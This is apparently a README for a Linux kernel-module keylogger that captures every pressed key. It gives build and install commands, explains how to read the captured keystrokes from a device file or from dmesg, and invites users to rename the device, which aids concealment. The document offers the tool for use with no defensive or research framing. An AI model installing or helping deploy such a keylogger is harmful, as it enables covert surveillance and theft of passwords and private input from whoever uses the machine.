👹 Kernel module key logger 👹
Capture all pressed key.
To see log : sudo cat /dev/keylogger
or remove the device with rmmod keylogger
to print the log as humane readable format in linux log (dmesg)
Feel free to modify the code and rename the device.
- make
- sudo insmod keylogger.ko